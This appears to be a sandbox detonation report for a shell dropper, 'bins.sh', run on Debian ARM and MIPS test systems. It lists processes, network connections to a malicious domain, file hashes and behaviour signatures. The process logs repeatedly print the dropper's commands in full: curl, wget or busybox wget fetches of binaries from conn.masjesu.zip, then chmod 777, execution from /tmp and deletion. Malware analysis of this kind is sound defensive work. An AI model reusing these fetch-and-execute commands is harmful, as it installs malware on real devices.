[chmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen

[./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/rm

[rm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/chmod

[chmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ

[./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/rm

[rm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/chmod

[chmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ

[./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/rm

[rm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/chmod

[chmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX

[./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/rm

[rm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/chmod

[chmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht

[./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/rm

[rm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/chmod

[chmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO

[./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/rm

[rm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/chmod

[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA

[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/rm

[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/chmod

[chmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj

[./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/rm

[rm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/chmod

[chmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p

[./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/rm

[rm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/chmod

[chmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf

[./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/rm

[rm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/chmod

[chmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O

[./lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/rm

[rm lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp

Files

/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral3

Detonation Overview

Submitted

2024-12-16 04:16

Reported

2024-12-16 04:52

Platform

debian9-armhf-20240611-en

Max time kernel

598s

Max time network

313s

Command Line

[/tmp/bins.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/chmod

[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA

[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/rm

[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-12-16 04:16

Reported

2024-12-16 04:52

Platform

debian9-mipsbe-20240611-en

Max time kernel

416s

Max time network

419s

Command Line

[/tmp/bins.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA N/A
N/A /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX N/A
N/A /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht N/A
N/A /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO N/A
N/A /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O N/A
N/A /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj N/A
N/A /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p N/A
N/A /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf N/A
N/A /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE N/A
N/A /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J N/A
N/A /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 N/A
N/A /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ N/A
N/A /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen N/A
N/A /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ N/A
N/A /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J N/A
N/A /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 N/A
N/A /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE N/A
N/A /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen N/A
N/A /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ N/A
N/A /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ N/A
N/A /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX N/A
N/A /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht N/A
N/A /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO N/A
N/A /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA N/A
N/A /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj N/A
N/A /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p N/A
N/A /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf N/A
N/A /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /usr/bin/curl N/A
File opened for modification /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /usr/bin/curl N/A
File opened for modification /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /usr/bin/curl N/A
File opened for modification /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /usr/bin/curl N/A
File opened for modification /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /usr/bin/curl N/A
File opened for modification /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /usr/bin/curl N/A
File opened for modification /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /usr/bin/curl N/A
File opened for modification /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /usr/bin/curl N/A
File opened for modification /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O /usr/bin/curl N/A
File opened for modification /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /usr/bin/curl N/A
File opened for modification /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /usr/bin/curl N/A
File opened for modification /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /usr/bin/curl N/A
File opened for modification /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /usr/bin/curl N/A
File opened for modification /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /usr/bin/curl N/A
File opened for modification /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O /usr/bin/curl N/A
File opened for modification /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /usr/bin/curl N/A
File opened for modification /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /usr/bin/curl N/A
File opened for modification /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /usr/bin/curl N/A
File opened for modification /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /usr/bin/curl N/A
File opened for modification /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /usr/bin/curl N/A
File opened for modification /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /usr/bin/curl N/A
File opened for modification /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /usr/bin/curl N/A
File opened for modification /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /usr/bin/curl N/A
File opened for modification /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /usr/bin/curl N/A
File opened for modification /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /usr/bin/curl N/A
File opened for modification /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /usr/bin/curl N/A
File opened for modification /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /usr/bin/curl N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/chmod

[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA

[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/rm

[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/bin/chmod

[chmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX

[./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/bin/rm

